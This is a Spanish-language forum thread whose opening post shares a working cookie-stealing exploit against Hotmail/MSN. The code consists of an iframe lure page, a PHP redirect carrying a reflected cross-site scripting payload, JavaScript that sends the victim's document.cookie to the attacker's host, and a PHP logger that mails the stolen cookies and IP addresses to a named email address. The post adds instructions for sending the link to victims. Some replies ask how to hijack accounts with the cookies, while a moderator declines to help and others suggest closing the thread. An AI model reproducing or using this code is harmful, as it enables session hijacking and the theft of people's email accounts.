[School]

Bueno estoy seguro de que este post será muy visitado jeje, como bien dice el título actualmente existe un gran bug en hotmail, tan grave que con solo pinchar en un enlace tu correo puede ser robado, este bug guarda las cookies de aquel que pinche en un enlace, de forma que son enviadas al correo que eligas(el tuyo vamos) y apartir de ahí facilmente puedes entrar al correo. Por favor si lo copiais no os olvideis la fuente, este bug era privado pero al parecer por un descuido salio a la luz.

Autor: _Antrax_
Web: www.c-group.org
Ya esta aceptado por Milw0rm aunque creo que aun no lo publicaron.

Exploit php

Index.php

Código:

Cita:

<html>
<body>
<IFRAME SRC="http://www.xxxx.com/ind.php" WIDTH=10 HEIGHT=10>
<A HREF="ind.php">link</A>
</IFRAME>
</body></html>

ind.php

Código:

Cita:

<?
$mysite = "http://www.xxxx.com/nice.js"; # <== Edit

$xpl = "http://moviles.es.msn.com/error.php?error=11&returnurl=%3C/script%3E%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/nice.js%3E%3C/script%3E";
print '
<title>ASD</title>
<body bgcolor="ffffff">
<center>
<b></b><br>
<img src="asd.gif"></center>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL='.$xpl.'">
';
?>

log.php

Código:

Cita:

<?
$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A");

$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
$subject = "cookie";
mail("antrax_sverige@hotmail.com", $subject, $msg);

header ("location: asd.gif");
?>

nice.js

Código:

Cita:

location.href='http://www.xxxx.com/log.php?nice='+escape(document.cookie)
reemplazar xxx.com por el sitio donde uno alojo los php ...

By Dario Struz
Greetz www.c-group.org Fr34k , penissmen , 4ur3v0ir , S4nt0!, DevilInsideTk , Putus , Inyexion , Bacan , Hanowars ,Chapinhack and Friends.

PD: Ahí teneís el codigo, simplemente armarlo con vuestros datos, subirlo a un ftp y enviar el enlace a alguien y recibireis es vuestro correo sus cookies.

Saludos An3urysm_

[zeratul]

Supuestamente obtengo la cookie de la victima pro luego quisiera ke me ayudaras a iniciar sesion con esa cookie obtenida he intentado hacerlo con proxomitron pro no me funciona, espero tu ayuda, gracias

[School]

Supuestamente no, el bug funciona te lo puedo asegurar, ya lo he probado y te llegan las cookies de la victima en cuanto ella pinche el enlace que le enviaste(5 min tarda).

Una vez te llegue usa como bien dijiste el proxomitron, te comento como usarlo por mp.

Que conste que yo no me dedico a robar correos de nadie, por que lo veo una estupidez, pero eso no significa que no pueda jajaj

Un saludo

[clarinetista]

Cada cual que haga lo que quiera con la info School, ese no es tu problema

PD: Gran aporte, de nuevo

[School]

Bueno sólo comentaros que este gran agujero de hotmail aun no han sido capaces de solucionarlo, simplemente te sale un cartelito diciendo que puede ser peligroso pinchar en enlaces, etc.
No me extrañaría que haya cambios en hotmail para darle una solución de verdad, sino al tanto.

Recalco que yo no me dedico a robar correos ni a joder webs ni nada de eso xD, pero creo que la información debe estar al alcance de todos.

Saludos

[j8k6f4v9j]

Claro que sí. Si yo tuviese información más o menos importante en una de esas cuentas (que no se dará el caso) querría saber cuanto antes de este tipo de situaciones.

Gracias por el aporte

Salu2

Keep on Rollin'

[chico1988]

no se ninguna pagina web donde subir estos archivos ?. YO tambien quiero probar este bug. Gracias

[Giskard]

Cita:

Iniciado por zeratul

Supuestamente obtengo la cookie de la victima pro luego quisiera ke me ayudaras a iniciar sesion con esa cookie obtenida he intentado hacerlo con proxomitron pro no me funciona, espero tu ayuda, gracias

Cita:

Iniciado por choco1988

no se ninguna pagina web donde subir estos archivos ?. YO tambien quiero probar este bug. Gracias

Como ya saben, en este foro no ayudamos a "probar bugs de hotmail" (robar cuentas de correo). La valiosa información que dio School principalmente debe ser para prevenirnos y que no roben nuestros correos.

Si quieren probar este bug para ver si funciona, ya tienen el exploit y lo demás corre por su propia cuenta y responsabilidad.

Saludos

[clarinetista]

Giskard, de nuevo sabias palabras.
Es como si pides a los de milworm que te expliquen un exploit o te lo den compilao y rulando.

[j8k6f4v9j]

Que es casi como lo dan, otra cosa es que también te hagan un programita que te vaya preguntando "¿Dónde quieres recibir la info?" o "¿Cuál es la cuenta de la que la quieres?"

Salu2

Keep on Rollin'

[chico1988]

Teneis razon chicos perdonad mi pregunta

[j8k6f4v9j]

Cita:

Iniciado por chico1988

Teneis razon chicos perdonad mi pregunta

No necesitas disculparte, lo que ocurre es que este tipo de posts es caldo de cultivo para script kiddies que no respetan la intimidad ajena.

Salu2

[Cypress]

Pues.. no se si les paresca bien, pero... ya que está presentado el tema y discutido.
¿ Por qué no cerrarlo ?

Por suerte todavia no han aparecido esos post que dicen: "me pueden sacar el pass de shashasha@hot... " y cosas así.

No se si les parece...

Saludos,
Cypress

[clarinetista]

Si, mejor cerrado